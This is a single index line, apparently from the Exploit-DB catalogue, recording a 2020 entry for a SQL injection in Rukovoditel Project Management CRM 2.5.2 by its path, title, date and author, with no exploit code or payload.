+47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 
'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,